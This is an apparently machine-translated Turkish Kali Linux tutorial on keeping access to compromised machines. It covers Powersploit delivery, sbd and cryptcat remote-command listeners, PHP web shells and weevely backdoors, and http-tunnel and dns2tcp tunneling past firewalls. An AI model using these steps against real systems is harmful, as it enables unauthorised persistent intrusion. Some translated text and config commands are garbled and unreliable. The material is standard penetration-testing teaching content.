Kali Linux - Erişimi Sürdürmek
Bu bölümde, Kali'nin bağlantıyı sürdürmek ve saldırıya uğramış bir makineye tekrar bağlanıp bağlantısı kesildiğinde bile erişmek için kullandığı araçları göreceğiz.
Powersploit
Bu, Windows makineleri için olan bir araçtır. Kurban makinesinde PowerShell kurulu. Bu araç, bilgisayar korsanının kurbanın makinesine PowerShell aracılığıyla bağlanmasına yardımcı olur.
Açmak için soldaki terminali açın ve powersploit klasörüne girmek için aşağıdaki komutu yazın -
cd /usr/share/powersploit/
Eğer yazarsan “ls”Erişim sağladıktan sonra kurbanın makinesine indirip kurabileceğiniz tüm powersploit araçlarını listeleyecektir. Çoğu, isimlerine göre kendi kendilerine anlatılan isimlerdir.
Bu aracı kurbanın makinesine indirmenin kolay bir yolu, powersploit araçlarının aşağıdaki komutu kullanarak kolayca oluşturmaya izin veren bir web sunucusu oluşturmaktır -
python -m SimpleHTTPServer
Bundan sonra şunu yazarsanız: http: // <Kali makine ip_adresi>: 8000 / aşağıdaki sonuç olur.
Sbd
sbd, Netcat'e benzer bir araçtır. Taşınabilirdir ve Linux ve Microsoft makinelerde kullanılabilir. sbd, AES-CBC-128 + HMAC-SHA1 şifrelemesine sahiptir> Temel olarak, belirli bir bağlantı noktasında herhangi bir zamanda kurbanın makinesine bağlanmaya ve komutları uzaktan göndermeye yardımcı olur.
Açmak için terminale gidin ve yazın “sbd -l -p port” sunucunun bağlantıları kabul etmesi için.
Bu durumda, sunucunun dinleyeceği port 44'ü koyalım.
Kurbanın sitesine yazın “sbd IPofserver port”. Uzaktan komutları gönderebileceğimiz bir bağlantı kurulacaktır.
Bu durumda, testi aynı makinede yaptığımız için "localhost" dır.
Son olarak, sunucuda aşağıdaki ekran görüntüsünde gösterildiği gibi bir bağlantının gerçekleştiğini göreceksiniz.
Web kabukları
Web kabukları, erişimi sürdürmek veya bir web sitesini hacklemek için kullanılabilir. Ancak çoğu antivirüsler tarafından tespit ediliyor. C99 php kabuğu, antivirüs arasında çok iyi bilinir. Herhangi bir yaygın antivirüs, onu bir kötü amaçlı yazılım olarak kolayca algılar.
Genel olarak, ana işlevi sistem komutunu web arayüzleri aracılığıyla göndermektir.
Açmak ve yazmak için “cd /usr/share/webshells/” terminalde.
Gördüğünüz gibi programlama diline göre sınıflara ayrılırlar: asp, aspx, cfm, jsp, perl, php
PHP klasörüne girerseniz, php web sayfaları için tüm web kabuklarını görebilirsiniz.
Kabuğu bir web sunucusuna yüklemek için, örneğin “simple-backdoor.php” web kabuğunun web sayfasını ve URL'sini açın.
Sonunda cmd komutunu yazın. Aşağıdaki ekran görüntüsündeki gibi gösterilen tüm bilgilere sahip olacaksınız.
Weevely
Weevely, telnet benzeri bağlantıyı simüle eden bir PHP web kabuğudur. Web uygulaması sonrası sömürü aracıdır ve gizli bir arka kapı olarak veya yasal web hesaplarını, hatta ücretsiz barındırılanları yönetmek için bir web kabuğu olarak kullanılabilir.
Açmak için terminale gidin ve kullanımını görebileceğiniz yere "en az" yazın.
Kabuğu oluşturmak için yazın “weevely generate password pathoffile”. Aşağıdaki ekran görüntüsünde görüldüğü gibi, "Masaüstü" klasöründe oluşturulur ve dosya erişim sağlamak için bir web sunucusuna yüklenecektir.
Aşağıdaki ekran görüntüsünde gösterildiği gibi web kabuğunu yükledikten sonra, komutunu kullanarak cmd ile sunucuya bağlanabiliriz. “weevely URL password” bir oturumun başladığını görebilirsiniz.
http tüneli
http tüneli, HTTP isteklerinde tünellenmiş çift yönlü bir sanal veri akışı oluşturur. İstenirse, istekler bir HTTP proxy aracılığıyla gönderilebilir. Bu, kısıtlayıcı güvenlik duvarlarının arkasındaki kullanıcılar için yararlı olabilir. HTTP proxy'si aracılığıyla WWW erişimine izin verilirse, güvenlik duvarının dışındaki bir bilgisayara bağlanmak için http tüneli ve telnet veya PPP kullanmak mümkündür.
Öncelikle aşağıdaki komutla bir tünel sunucusu oluşturmalıyız -
httptunnel_server –h
Ardından, müşteri site türünde “httptunnel_client –h” ve her ikisi de bağlantıları kabul etmeye başlayacak.
dns2tcp
Bu yine, TCP trafiğini DNS Trafiğinden geçirmeye yardımcı olan bir tünelleme aracıdır, yani UDP 53 bağlantı noktası.
Başlamak için yazın “dns2tcpd”. Komut dosyasını ne zaman açacağınız açıklanmaktadır.
Sunucu sitesinde, dosyayı yapılandırmak için bu komutu girin.
#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
İstemci sitesinde bu komutu girin.
# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
Tünel açma bu komutla başlayacaktır.
Cryptcat
Bir kurbanın makinesiyle şifreli bir şekilde TCP ve UDP bağlantısı kurmaya izin veren Netcat gibi başka bir araçtır.
Bir bağlantıyı dinlemek üzere bir sunucu başlatmak için aşağıdaki komutu yazın -
cryptcat –l –p port –n
Nerede,
-l bir bağlantıyı dinlemek için duruyor
-p bağlantı noktası numarası parametresi anlamına gelir
-n isim çözümlemesini yapmamak anlamına gelir
İstemci sitesinde bağlantı komutu “cryptcat IPofServer PortofServer”